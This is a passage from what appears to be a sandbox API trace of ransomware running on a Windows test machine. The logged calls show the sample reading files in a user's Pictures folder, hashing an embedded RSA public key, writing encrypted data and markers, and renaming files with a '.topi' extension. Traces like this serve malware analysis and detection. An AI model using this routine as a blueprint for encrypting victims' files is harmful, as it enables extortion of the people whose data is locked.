hHeap=0x680000) returned 1 [0095.607] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0095.607] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x439, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb14*=0x439, lpOverlapped=0x0) returned 1 [0095.607] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.607] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x43e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.607] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0095.607] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0095.607] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0095.607] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0095.607] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0095.607] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0095.608] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.608] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0095.608] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0095.608] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0095.608] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0095.608] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0095.608] CloseHandle (hObject=0x6a8) returned 1 [0095.610] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0095.610] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x890) returned 0x31cf750 [0095.610] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0095.610] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\M-KbgZCgiX ZQ5383.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\m-kbgzcgix zq5383.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\M-KbgZCgiX ZQ5383.gif.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\m-kbgzcgix zq5383.gif.topi")) returned 1 [0095.611] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.611] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.611] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.612] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0095.612] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67901f90, ftCreationTime.dwHighDateTime=0x1d5c0c0, ftLastAccessTime.dwLowDateTime=0x7a851290, ftLastAccessTime.dwHighDateTime=0x1d5c48a, ftLastWriteTime.dwLowDateTime=0x7a851290, ftLastWriteTime.dwHighDateTime=0x1d5c48a, nFileSizeHigh=0x0, nFileSizeLow=0x1484d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pT2jCSlE056d3.bmp", cAlternateFileName="PT2JCS~1.BMP")) returned 1 [0095.612] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0095.612] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0095.612] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.612] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pT2jCSlE056d3.bmp") returned=".bmp" [0095.612] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\pT2jCSlE056d3.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\pt2jcsle056d3.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.612] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=84045) returned 1 [0095.612] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.615] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x14827, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.615] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.616] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.616] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.616] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.616] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x1484d, lpOverlapped=0x0) returned 1 [0095.617] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.617] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0095.617] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.617] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0095.617] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6deef8) returned 1 [0095.618] CryptCreateHash (in: hProv=0x6deef8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.618] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.618] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.618] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.618] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.618] GetLastError () returned 0x0 [0095.618] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.618] CryptReleaseContext (hProv=0x6deef8, dwFlags=0x0) returned 1 [0095.618] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.618] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.618] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.618] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.618] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.618] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.618] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.618] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14850) returned 0x9a06a00 [0095.618] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.618] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1ec0 [0095.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9558 [0095.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1f08 [0095.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9570 [0095.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d95a0 [0095.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d95b8 [0095.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.619] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.619] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d95a0 | out: hHeap=0x680000) returned 1 [0095.619] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d95b8 | out: hHeap=0x680000) returned 1 [0095.619] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.619] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.619] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0095.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d95b8 [0095.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0095.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d95a0 [0095.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0095.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.619] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.619] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.619] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d95b8 | out: hHeap=0x680000) returned 1 [0095.620] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.620] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d95a0 | out: hHeap=0x680000) returned 1 [0095.620] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.620] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.620] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.620] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.620] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0095.620] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.620] GetCurrentThreadId () returned 0x8c4 [0095.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f67c0 [0095.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0095.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.620] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.620] GetCurrentThreadId () returned 0x8c4 [0095.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.620] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.620] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.620] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.620] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.620] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0095.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.620] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.621] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d95a0 [0095.621] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0095.621] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d95b8 [0095.621] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.621] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9588 [0095.621] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.621] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.621] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.621] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.621] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d95d0 [0095.622] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e68 [0095.622] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0095.622] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0095.622] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0095.622] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d95a0 | out: hHeap=0x680000) returned 1 [0095.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d95a0 [0095.622] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0095.622] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0095.622] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0095.622] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0095.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0095.622] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0095.622] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d95a0 | out: hHeap=0x680000) returned 1 [0095.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0095.622] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0095.622] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.622] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.622] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0095.622] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0095.622] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0095.622] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0095.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0095.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0095.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d95d0 | out: hHeap=0x680000) returned 1 [0095.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d95b8 | out: hHeap=0x680000) returned 1 [0095.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9588 | out: hHeap=0x680000) returned 1 [0095.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0095.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0095.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0095.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9570 | out: hHeap=0x680000) returned 1 [0095.623] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f1f08 | out: hHeap=0x680000) returned 1 [0095.623] 